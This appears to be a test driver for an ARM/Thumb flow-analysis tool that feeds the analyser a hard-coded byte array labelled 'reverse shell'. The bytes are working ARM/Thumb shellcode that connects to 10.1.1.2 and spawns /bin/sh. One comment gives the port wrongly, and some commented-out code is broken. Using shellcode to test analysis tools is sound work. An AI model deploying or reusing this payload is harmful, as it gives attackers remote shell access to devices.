
#include <stdio.h>
#include <stdlib.h>

#include "flow_thumb.h"
#include "flow_arm.h"

using namespace std;

// reverse shell
int buffer_len = 72;
char buffer[] = {

	0x01, 0x10, 0x8F, 0xE2,
	0x11, 0xFF, 0x2F, 0xE1,

	0x02, 0x20, 0x01, 0x21,
	0x92, 0x1a, 0x0f, 0x02,
	0x19, 0x37, 0x01, 0xdf,
	0x06, 0x1c, 0x08, 0xa1,
	0x10, 0x22, 0x02, 0x37,
	0x01, 0xdf, 0x3f, 0x27,
	0x02, 0x21,

	0x30, 0x1c, 0x01, 0xdf,
	0x01, 0x39, 0xfb, 0xd5,
	0x05, 0xa0, 0x92, 0x1a,
	0x05, 0xb4, 0x69, 0x46,
	0x0b, 0x27,0x01, 0xdf,
	0xc0, 0x46,

	/* struct sockaddr */
	0x02, 0x00,
	/* port: 0x1234 */
	0x13, 0x37,
	/* ip: 10.1.1.2 */
	0x0A, 0x01, 0x01, 0x02,

	/* "/bin/sh\0" */
	0x2f, 0x62, 0x69, 0x6e,0x2f, 0x73, 0x68, 0x00
};

int main()
{
	/*
	FILE* f = fopen("test.bin","r");
	if (f == NULL) {
		printf("Opening error\n");
	
	char buffer[2048];
	
	fgets(f,buffer);
	*/
	char *buf = (char*)malloc( buffer_len * sizeof(char) );
	for (int i=0; i<buffer_len; i++)
		buf[i] = buffer[i];
	
	printf("============ THUMB =============\n");
	Flow_thumb 	THUMB_FLOW( (const unsigned char*)buf, buffer_len);
	printf("============ ARM ==============\n");
	Flow_arm 	ARM_FLOW( (const unsigned char*)buf, buffer_len);
	
	return 0;
}
